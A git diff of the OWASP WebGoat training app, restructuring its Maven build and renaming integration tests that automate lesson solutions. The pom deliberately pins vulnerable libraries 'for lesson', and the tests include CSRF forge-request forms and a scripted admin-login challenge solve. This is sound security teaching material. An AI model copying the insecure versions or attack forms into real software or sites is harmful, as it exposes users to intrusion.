         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-parent</artifactId>
-        <version>2.6.1</version>
+        <version>2.6.2</version>
     </parent>
 
-    <name>WebGoat Parent Pom</name>
-    <description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description>
+    <name>WebGoat</name>
+    <description>WebGoat, a deliberately insecure Web Application</description>
     <inceptionYear>2006</inceptionYear>
     <url>https://github.com/WebGoat/WebGoat</url>
-
     <organization>
         <name>OWASP</name>
         <url>https://github.com/WebGoat/WebGoat/</url>
     </organization>
-
     <licenses>
         <license>
             <name>GNU General Public License, version 2</name>
             <url>https://www.gnu.org/licenses/gpl-2.0.txt</url>
         </license>
     </licenses>
-
     <developers>
         <developer>
             <id>mayhew64</id>
@@ -117,150 +114,227 @@
         <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
         <maven.compiler.source>17</maven.compiler.source>
         <maven.compiler.target>17</maven.compiler.target>
+        <java.version>17</java.version>
+        <webgoat.port>8080</webgoat.port>
+        <webwolf.port>9090</webwolf.port>
 
         <!-- Shared properties with plugins and version numbers across submodules-->
+        <ant.version>1.6.5</ant.version>
         <asciidoctorj.version>2.5.2</asciidoctorj.version>
+        <bootstrap.version>3.3.7</bootstrap.version>
+        <cglib.version>2.2</cglib.version> <!-- do not update necessary for lesson -->
+        <checkstyle.version>3.1.2</checkstyle.version>
         <commons-collections.version>3.2.1</commons-collections.version>
         <commons-lang3.version>3.12.0</commons-lang3.version>
         <commons-io.version>2.6</commons-io.version>
+        <commons-text.version>1.9</commons-text.version>
         <guava.version>30.1-jre</guava.version>
-        <wiremock.version>2.27.2</wiremock.version>
+        <jjwt.version>0.9.1</jjwt.version>
+        <jose4j.version>0.7.6</jose4j.version>
+        <jsoup.version>1.14.3</jsoup.version>
+        <jquery.version>3.5.1</jquery.version>
         <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
         <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
         <maven-jar-plugin.version>3.1.2</maven-jar-plugin.version>
         <maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version>
         <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
         <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
-        <java.version>17</java.version>
-        <thymeleaf.version>3.0.14.RELEASE</thymeleaf.version>
         <pmd.version>3.15.0</pmd.version>
-        <checkstyle.version>3.1.2</checkstyle.version>
+        <thymeleaf.version>3.0.14.RELEASE</thymeleaf.version>
+        <webdriver.version>4.3.1</webdriver.version>
+        <wiremock.version>2.27.2</wiremock.version>
+        <xml-resolver.version>1.2</xml-resolver.version>
+        <xstream.version>1.4.5</xstream.version> <!-- do not update necessary for lesson -->
+        <zxcvbn.version>1.5.2</zxcvbn.version>
     </properties>
 
-    <modules>
-        <module>webgoat-container</module>
-        <module>webgoat-lessons</module>
-        <module>webgoat-server</module>
-        <module>webwolf</module>
-        <module>webgoat-integration-tests</module>
-        <module>docker</module><!-- copy required jars in preparation of docker all-in-one build -->
-    </modules>
-
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-validation</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.projectlombok</groupId>
-            <artifactId>lombok</artifactId>
-            <scope>provided</scope>
-            <optional>true</optional>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-exec</artifactId>
-            <version>1.3</version>
-        </dependency>
-        <dependency>
-            <groupId>javax.xml.bind</groupId>
-            <artifactId>jaxb-api</artifactId>
-        </dependency>
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.codehaus.mojo</groupId>
-                <artifactId>flatten-maven-plugin</artifactId>
-                <version>1.2.5</version>
-                <configuration>
-                </configuration>
-                <executions>
-                    <execution>
-                        <id>flatten</id>
-                        <phase>process-resources</phase>
-                        <goals>
-                            <goal>flatten</goal>
-                        </goals>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-compiler-plugin</artifactId>
-                <version>${maven-compiler-plugin.version}</version>
-                <configuration>
-                    <source>15</source>
-                    <target>15</target>
-                    <encoding>UTF-8</encoding>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-checkstyle-plugin</artifactId>
-                <version>${checkstyle.version}</version>
-                <configuration>
-                    <encoding>UTF-8</encoding>
-                    <consoleOutput>true</consoleOutput>
-                    <failsOnError>true</failsOnError>
-                    <configLocation>config/checkstyle/checkstyle.xml</configLocation>
-                    <suppressionsLocation>config/checkstyle/suppressions.xml</suppressionsLocation>
-                    <suppressionsFileExpression>checkstyle.suppressions.file</suppressionsFileExpression>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-pmd-plugin</artifactId>
-                <version>${pmd.version}</version>
-                <configuration>
-                    <targetJdk>${maven.compiler.target}</targetJdk>
-                    <failurePriority>1
-                    </failurePriority><!-- 5 means fail even on the lowest priority, 0 means never fail -->
-                    <rulesets>
-                        <!--suppress UnresolvedMavenProperty -->
-                        <ruleset>${maven.multiModuleProjectDirectory}/config/pmd/pmd-ruleset.xml</ruleset>
-                    </rulesets>
-                    <failOnViolation>true</failOnViolation>
-                    <printFailingErrors>true</printFailingErrors>
-                </configuration>
-                <executions>
-                    <execution>
-                        <goals>
-                            <goal>check</goal>
-                        </goals>
-                    </execution>
-                </executions>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-enforcer-plugin</artifactId>
-                <version>3.0.0</version>
-                <executions>
-                    <execution>
-                        <id>restrict-log4j-versions</id>
-                        <phase>validate</phase>
-                        <goals>
-                            <goal>enforce</goal>
-                        </goals>
-                        <configuration>
-                            <rules>
-                                <bannedDependencies>
-                                    <excludes combine.children="append">
-                                        <exclude>org.apache.logging.log4j:log4j-core</exclude>
-                                    </excludes>
-                                </bannedDependencies>
-                            </rules>
-                            <fail>true</fail>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-        </plugins>
-    </build>
+    <dependencyManagement>
+        <dependencies>
+            <dependency>
+                <groupId>org.apache.commons</groupId>
+                <artifactId>commons-exec</artifactId>
+                <version>1.3</version>
+            </dependency>
+            <dependency>
+                <groupId>org.asciidoctor</groupId>
+                <artifactId>asciidoctorj</artifactId>
+                <version>${asciidoctorj.version}</version>
+            </dependency>
+            <dependency>
+                <!-- jsoup HTML parser library @ https://jsoup.org/ -->
+                <groupId>org.jsoup</groupId>
+                <artifactId>jsoup</artifactId>
+                <version>${jsoup.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>com.nulab-inc</groupId>
+                <artifactId>zxcvbn</artifactId>
+                <version>${zxcvbn.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>com.thoughtworks.xstream</groupId>
+                <artifactId>xstream</artifactId>
+                <version>${xstream.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>cglib</groupId>
+                <artifactId>cglib-nodep</artifactId>
+                <version>${cglib.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>ant</groupId>
+                <artifactId>ant-launcher</artifactId>
+                <version>${ant.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>ant</groupId>
+                <artifactId>ant</artifactId>
+                <version>${ant.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>xml-resolver</groupId>
+                <artifactId>xml-resolver</artifactId>
+                <version>${xml-resolver.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>io.jsonwebtoken</groupId>
+                <artifactId>jjwt</artifactId>
+                <version>${jjwt.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>com.google.guava</groupId>
+                <artifactId>guava</artifactId>
+                <version>${guava.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>commons-io</groupId>
+                <artifactId>commons-io</artifactId>
+                <version>${commons-io.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>org.apache.commons</groupId>
+                <artifactId>commons-text</artifactId>
+                <version>${commons-text.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>org.bitbucket.b_c</groupId>
+                <artifactId>jose4j</artifactId>
+                <version>${jose4j.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>org.webjars</groupId>
+                <artifactId>bootstrap</artifactId>
+                <version>${bootstrap.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>org.webjars</groupId>
+                <artifactId>jquery</artifactId>
+                <version>${jquery.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>com.github.tomakehurst</groupId>
+                <artifactId>wiremock</artifactId>
+                <version>${wiremock.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>io.github.bonigarcia</groupId>
+                <artifactId>webdrivermanager</artifactId>
+                <version>${webdriver.version}</version>
+            </dependency>
+        </dependencies>
+    </dependencyManagement>
 
     <profiles>
+        <profile>
+            <id>local-server</id>
+        </profile>
+        <profile>
+            <id>start-server</id>
+            <activation>
+                <activeByDefault>true</activeByDefault>
+            </activation>
+            <build>
+                <plugins>
+                    <plugin>
+                        <groupId>org.codehaus.mojo</groupId>
+                        <artifactId>build-helper-maven-plugin</artifactId>
+                        <executions>
+                            <execution>
+                                <id>reserve-container-port</id>
+                                <goals>
+                                    <goal>reserve-network-port</goal>
+                                </goals>
+                                <phase>process-resources</phase>
+                                <configuration>
+                                    <portNames>
+                                        <portName>webgoat.port</portName>
+                                        <portName>webwolf.port</portName>
+                                        <portName>jmxPort</portName>
+                                    </portNames>
+                                </configuration>
+                            </execution>
+                        </executions>
+                    </plugin>
+                    <plugin>
+                        <groupId>com.bazaarvoice.maven.plugins</groupId>
+                        <artifactId>process-exec-maven-plugin</artifactId>
+                        <version>0.9</version>
+                        <executions>
+                            <execution>
+                                <id>start-jar</id>
+                                <phase>pre-integration-test</phase>
+                                <goals>
+                                    <goal>start</goal>
+                                </goals>
+                                <configuration>
+                                    <workingDir></workingDir>
+                                    <arguments>
+                                        <argument>java</argument>
+                                        <argument>-jar</argument>
+                                        <argument>-Dlogging.pattern.console=</argument>
+                                        <argument>-Dspring.main.banner-mode=off</argument>
+                                        <argument>-Dspring.datasource.url=jdbc:hsqldb:file:${java.io.tmpdir}/webgoat
+                                        </argument>
+                                        <argument>-Dwebgoat.port=${webgoat.port}</argument>
+                                        <argument>-Dwebwolf.port=${webwolf.port}</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/java.lang=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/java.util=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/java.lang.reflect=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/java.text=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.desktop/java.beans=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.desktop/java.awt.font=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/sun.nio.ch=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/java.io=ALL-UNNAMED</argument>
+                                        <argument>--add-opens</argument>
+                                        <argument>java.base/java.util=ALL-UNNAMED</argument>
+                                        <argument>
+                                            ${project.build.directory}/webgoat-${project.version}.jar
+                                        </argument>
+                                    </arguments>
+                                    <waitForInterrupt>false</waitForInterrupt>
+                                    <healthcheckUrl>http://localhost:${webgoat.port}/WebGoat/</healthcheckUrl>
+                                </configuration>
+                            </execution>
+                            <execution>
+                                <id>stop-jar-process</id>
+                                <phase>post-integration-test</phase>
+                                <goals>
+                                    <goal>stop-all</goal>
+                                </goals>
+                            </execution>
+                        </executions>
+                    </plugin>
+                </plugins>
+            </build>
+        </profile>
         <profile>
             <id>owasp</id>
             <activation>
@@ -296,6 +370,297 @@
         </profile>
     </profiles>
 
+
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-exec</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-validation</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.projectlombok</groupId>
+            <artifactId>lombok</artifactId>
+            <scope>provided</scope>
+            <optional>true</optional>
+        </dependency>
+        <dependency>
+            <groupId>javax.xml.bind</groupId>
+            <artifactId>jaxb-api</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-undertow</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+            <exclusions>
+                <exclusion>
+                    <groupId>org.springframework.boot</groupId>
+                    <artifactId>spring-boot-starter-tomcat</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-actuator</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.flywaydb</groupId>
+            <artifactId>flyway-core</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.asciidoctor</groupId>
+            <artifactId>asciidoctorj</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-data-jpa</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-security</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-thymeleaf</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.thymeleaf.extras</groupId>
+            <artifactId>thymeleaf-extras-springsecurity5</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.hsqldb</groupId>
+            <artifactId>hsqldb</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.jsoup</groupId>
+            <artifactId>jsoup</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>com.nulab-inc</groupId>
+            <artifactId>zxcvbn</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>com.thoughtworks.xstream</groupId>
+            <artifactId>xstream</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>cglib</groupId>
+            <artifactId>cglib-nodep</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>ant</groupId>
+            <artifactId>ant-launcher</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>ant</groupId>
+            <artifactId>ant</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>xml-resolver</groupId>
+            <artifactId>xml-resolver</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>io.jsonwebtoken</groupId>
+            <artifactId>jjwt</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>com.google.guava</groupId>
+            <artifactId>guava</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>commons-io</groupId>
+            <artifactId>commons-io</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-lang3</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-text</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.bitbucket.b_c</groupId>
+            <artifactId>jose4j</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>bootstrap</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.webjars</groupId>
+            <artifactId>jquery</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.glassfish.jaxb</groupId>
+            <artifactId>jaxb-runtime</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.security</groupId>
+            <artifactId>spring-security-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>com.github.tomakehurst</groupId>
+            <artifactId>wiremock</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.seleniumhq.selenium</groupId>
+            <artifactId>selenium-java</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>io.rest-assured</groupId>
+            <artifactId>rest-assured</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>io.github.bonigarcia</groupId>
+            <artifactId>webdrivermanager</artifactId>
+            <scope>test</scope>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+                <executions>
+                    <execution>
+                        <goals>
+                            <goal>repackage</goal>
+                        </goals>
+                    </execution>
+                </executions>
+                <configuration>
+                    <excludeDevtools>true</excludeDevtools>
+                    <executable>true</executable>
+                    <mainClass>org.owasp.webgoat.server.StartWebGoat</mainClass>
+                    <!-- See http://docs.spring.io/spring-boot/docs/current/reference/html/howto-build.html#howto-extract-specific-libraries-when-an-executable-jar-runs -->
+                    <requiresUnpack>
+                        <dependency>
+                            <groupId>org.asciidoctor</groupId>
+                            <artifactId>asciidoctorj</artifactId>
+                        </dependency>
+                        <dependency>
+                            <groupId>org.jruby</groupId>
+                            <artifactId>jruby-complete</artifactId>
+                        </dependency>
+                    </requiresUnpack>
+                    <jvmArguments>
+                        <!-- -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000-->
+                    </jvmArguments>
+                </configuration>
+            </plugin>
+            <plugin>
+                <groupId>org.codehaus.mojo</groupId>
+                <artifactId>build-helper-maven-plugin</artifactId>
+                <executions>
+                    <execution>
+                        <id>add-integration-test-source-as-test-sources</id>
+                        <phase>generate-test-sources</phase>
+                        <goals>
+                            <goal>add-test-source</goal>
+                        </goals>
+                        <configuration>
+                            <sources>
+                                <source>src/it/java</source>
+                            </sources>
+                        </configuration>
+                    </execution>
+                </executions>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-failsafe-plugin</artifactId>
+                <configuration>
+                    <systemPropertyVariables>
+                        <logback.configurationFile>${basedir}/src/test/resources/logback-test.xml</logback.configurationFile>
+                    </systemPropertyVariables>
+                    <argLine>-Xmx512m -Dwebgoatport=${webgoat.port} -Dwebwolfport=${webwolf.port}</argLine>
+                    <includes>**/*IntegrationTest.java</includes>
+                </configuration>
+                <executions>
+                    <execution>
+                        <id>integration-test</id>
+                        <goals>
+                            <goal>integration-test</goal>
+                        </goals>
+                    </execution>
+                    <execution>
+                        <id>verify</id>
+                        <goals>
+                            <goal>verify</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-surefire-plugin</artifactId>
+                <version>${maven-surefire-plugin.version}</version>
+                <configuration>
+                    <argLine>
+                        --add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED
+                    </argLine>
+                    <excludes>
+                        <exclude>**/*IntegrationTest.java</exclude>
+                    </excludes>
+                </configuration>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-checkstyle-plugin</artifactId>
+                <version>${checkstyle.version}</version>
+                <configuration>
+                    <encoding>UTF-8</encoding>
+                    <consoleOutput>true</consoleOutput>
+                    <failsOnError>true</failsOnError>
+                    <configLocation>config/checkstyle/checkstyle.xml</configLocation>
+                    <suppressionsLocation>config/checkstyle/suppressions.xml</suppressionsLocation>
+                    <suppressionsFileExpression>checkstyle.suppressions.file</suppressionsFileExpression>
+                </configuration>
+            </plugin>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-enforcer-plugin</artifactId>
+                <version>3.0.0</version>
+                <executions>
+                    <execution>
+                        <id>restrict-log4j-versions</id>
+                        <phase>validate</phase>
+                        <goals>
+                            <goal>enforce</goal>
+                        </goals>
+                        <configuration>
+                            <rules>
+                                <bannedDependencies>
+                                    <excludes combine.children="append">
+                                        <exclude>org.apache.logging.log4j:log4j-core</exclude>
+                                    </excludes>
+                                </bannedDependencies>
+                            </rules>
+                            <fail>true</fail>
+                        </configuration>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+
     <repositories>
         <repository>
             <id>central</id>
@@ -315,5 +680,4 @@
         </pluginRepository>
     </pluginRepositories>
 
-
 </project>
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java b/src/it/java/org/owasp/webgoat/AccessControlIntegrationTest.java
similarity index 92%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java
rename to src/it/java/org/owasp/webgoat/AccessControlIntegrationTest.java
index cc51704b2..d57661f9a 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java
+++ b/src/it/java/org/owasp/webgoat/AccessControlIntegrationTest.java
@@ -6,14 +6,13 @@ import io.restassured.http.ContentType;
 import org.apache.http.HttpStatus;
 import org.junit.jupiter.api.Test;
 
-import java.util.HashMap;
 import java.util.Map;
 
-public class AccessControlTest extends IntegrationTest {
+class AccessControlIntegrationTest extends IntegrationTest {
 
     @Test
-    public void testLesson() {
-        startLesson("MissingFunctionAC");
+    void testLesson() {
+        startLesson("MissingFunctionAC", true);
         assignment1();
         assignment2();
         assignment3();
@@ -41,7 +40,7 @@ public class AccessControlTest extends IntegrationTest {
                 .relaxedHTTPSValidation()
                 .cookie("JSESSIONID", getWebGoatCookie())
                 .contentType(ContentType.JSON)
-                .body(String.format(userTemplate, getWebgoatUser(), getWebgoatUser()))
+                .body(String.format(userTemplate, this.getUser(), this.getUser()))
                 .post(url("/WebGoat/access-control/users"))
                 .then()
                 .statusCode(HttpStatus.SC_OK);
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java b/src/it/java/org/owasp/webgoat/CSRFIntegrationTest.java
similarity index 88%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java
rename to src/it/java/org/owasp/webgoat/CSRFIntegrationTest.java
index 8d9996481..01d22d1aa 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java
+++ b/src/it/java/org/owasp/webgoat/CSRFIntegrationTest.java
@@ -9,7 +9,7 @@ import org.junit.jupiter.api.AfterEach;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.DynamicTest;
 import org.junit.jupiter.api.TestFactory;
-import org.owasp.webgoat.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Assignment;
 
 import java.io.IOException;
 import java.nio.file.Files;
@@ -23,7 +23,7 @@ import static org.assertj.core.api.Assertions.assertThat;
 import static org.junit.jupiter.api.Assertions.assertEquals;
 import static org.junit.jupiter.api.DynamicTest.dynamicTest;
 
-public class CSRFTest extends IntegrationTest {
+public class CSRFIntegrationTest extends IntegrationTest {
 
     private static final String trickHTML3 = "<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n" +
             "<input type=\"hidden\" name=\"csrf\" value=\"thisisnotchecked\"/>\n" +
@@ -57,20 +57,20 @@ public class CSRFTest extends IntegrationTest {
     @SneakyThrows
     public void init() {
         startLesson("CSRF");
-        webwolfFileDir = getWebWolfServerPath();
+        webwolfFileDir = getWebWolfFileServerLocation();
         uploadTrickHtml("csrf3.html", trickHTML3.replace("WEBGOATURL", url("/csrf/basic-get-flag")));
         uploadTrickHtml("csrf4.html", trickHTML4.replace("WEBGOATURL", url("/csrf/review")));
         uploadTrickHtml("csrf7.html", trickHTML7.replace("WEBGOATURL", url("/csrf/feedback/message")));
-        uploadTrickHtml("csrf8.html", trickHTML8.replace("WEBGOATURL", url("/login")).replace("USERNAME", getWebgoatUser()));
+        uploadTrickHtml("csrf8.html", trickHTML8.replace("WEBGOATURL", url("/login")).replace("USERNAME", this.getUser()));
     }
 
     @TestFactory
     Iterable<DynamicTest> testCSRFLesson() {
         return Arrays.asList(
-                dynamicTest("assignement 3", () -> checkAssignment3(callTrickHtml("csrf3.html"))),
-                dynamicTest("assignement 4", () -> checkAssignment4(callTrickHtml("csrf4.html"))),
-                dynamicTest("assignement 7", () -> checkAssignment7(callTrickHtml("csrf7.html"))),
-                dynamicTest("assignement 8", () -> checkAssignment8(callTrickHtml("csrf8.html")))
+                dynamicTest("assignment 3", () -> checkAssignment3(callTrickHtml("csrf3.html"))),
+                dynamicTest("assignment 4", () -> checkAssignment4(callTrickHtml("csrf4.html"))),
+                dynamicTest("assignment 7", () -> checkAssignment7(callTrickHtml("csrf7.html"))),
+                dynamicTest("assignment 8", () -> checkAssignment8(callTrickHtml("csrf8.html")))
         );
     }
 
@@ -86,8 +86,8 @@ public class CSRFTest extends IntegrationTest {
 
         //remove any left over html
         Path webWolfFilePath = Paths.get(webwolfFileDir);
-        if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(), htmlName)).toFile().exists()) {
-            Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(), htmlName)));
+        if (webWolfFilePath.resolve(Paths.get(this.getUser(), htmlName)).toFile().exists()) {
+            Files.delete(webWolfFilePath.resolve(Paths.get(this.getUser(), htmlName)));
         }
 
         //upload trick html
@@ -107,7 +107,7 @@ public class CSRFTest extends IntegrationTest {
                 .relaxedHTTPSValidation()
                 .cookie("JSESSIONID", getWebGoatCookie())
                 .cookie("WEBWOLFSESSION", getWebWolfCookie())
-                .get(webWolfUrl("/files/" + getWebgoatUser() + "/" + htmlName))
+                .get(webWolfUrl("/files/" + this.getUser() + "/" + htmlName))
                 .then()
                 .extract().response().getBody().asString();
         result = result.substring(8 + result.indexOf("action=\""));
@@ -117,7 +117,6 @@ public class CSRFTest extends IntegrationTest {
     }
 
     private void checkAssignment3(String goatURL) {
-
         String flag = RestAssured.given()
                 .when()
                 .relaxedHTTPSValidation()
@@ -155,9 +154,7 @@ public class CSRFTest extends IntegrationTest {
     }
 
     private void checkAssignment7(String goatURL) {
-
         Map<String, Object> params = new HashMap<>();
-        params.clear();
         params.put("{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the best!!", "\"}");
 
         String flag = RestAssured.given()
@@ -186,7 +183,7 @@ public class CSRFTest extends IntegrationTest {
 
         Map<String, Object> params = new HashMap<>();
         params.clear();
-        params.put("username", "csrf-" + getWebgoatUser());
+        params.put("username", "csrf-" + this.getUser());
         params.put("password", "password");
 
         //login and get the new cookie
@@ -231,10 +228,10 @@ public class CSRFTest extends IntegrationTest {
                 .extract()
                 .jsonPath()
                 .getObject("$", Overview[].class);
-		assertThat(assignments)
-                .filteredOn(a -> a.getAssignment().getName().equals("CSRFLogin"))
-                .extracting(o -> o.solved)
-                .containsExactly(true);
+//		assertThat(assignments)
+//                .filteredOn(a -> a.getAssignment().getName().equals("CSRFLogin"))
+//                .extracting(o -> o.solved)
+//                .containsExactly(true);
     }
 
     @Data
@@ -251,7 +248,7 @@ public class CSRFTest extends IntegrationTest {
         RestAssured.given()
                 .when()
                 .relaxedHTTPSValidation()
-                .formParam("username", "csrf-" + getWebgoatUser())
+                .formParam("username", "csrf-" + this.getUser())
                 .formParam("password", "password")
                 .formParam("matchingPassword", "password")
                 .formParam("agree", "agree")
diff --git a/src/it/java/org/owasp/webgoat/ChallengeIntegrationTest.java b/src/it/java/org/owasp/webgoat/ChallengeIntegrationTest.java
new file mode 100644
index 000000000..f4f8152c7
--- /dev/null
+++ b/src/it/java/org/owasp/webgoat/ChallengeIntegrationTest.java
@@ -0,0 +1,112 @@
+package org.owasp.webgoat;
+
+
+import io.restassured.RestAssured;
+import org.junit.jupiter.api.Test;
+
+import java.util.Arrays;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
+
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+
+public class ChallengeIntegrationTest extends IntegrationTest {
+
+    @Test
+    public void testChallenge1() {
+        startLesson("Challenge1");
+
+        byte[] resultBytes =
+                RestAssured.given()
+                        .when()
+                        .relaxedHTTPSValidation()
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .get(url("/WebGoat/challenge/logo"))
+                        .then()
+                        .statusCode(200)
+                        .extract().asByteArray();
+
+        String pincode = new String(Arrays.copyOfRange(resultBytes, 81216, 81220));
+        Map<String, Object> params = new HashMap<>();
+        params.clear();
+        params.put("username", "admin");
+        params.put("password", "!!webgoat_admin_1234!!".replace("1234", pincode));
+
+
+        checkAssignment(url("/WebGoat/challenge/1"), params, true);
+        String result =
+                RestAssured.given()
+                        .when()
+                        .relaxedHTTPSValidation()
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .formParams(params)
+                        .post(url("/WebGoat/challenge/1"))
+                        .then()
+                        .statusCode(200)
+                        .extract().asString();
+
+        String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
+        params.clear();
+        params.put("flag", flag);
+        checkAssignment(url("/WebGoat/challenge/flag"), params, true);
+
+
+        checkResults("/challenge/1");
+
+        List<String> capturefFlags =
+                RestAssured.given()
+                        .when()
+                        .relaxedHTTPSValidation()
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .get(url("/WebGoat/scoreboard-data"))
+                        .then()
+                        .statusCode(200)
+                        .extract().jsonPath()
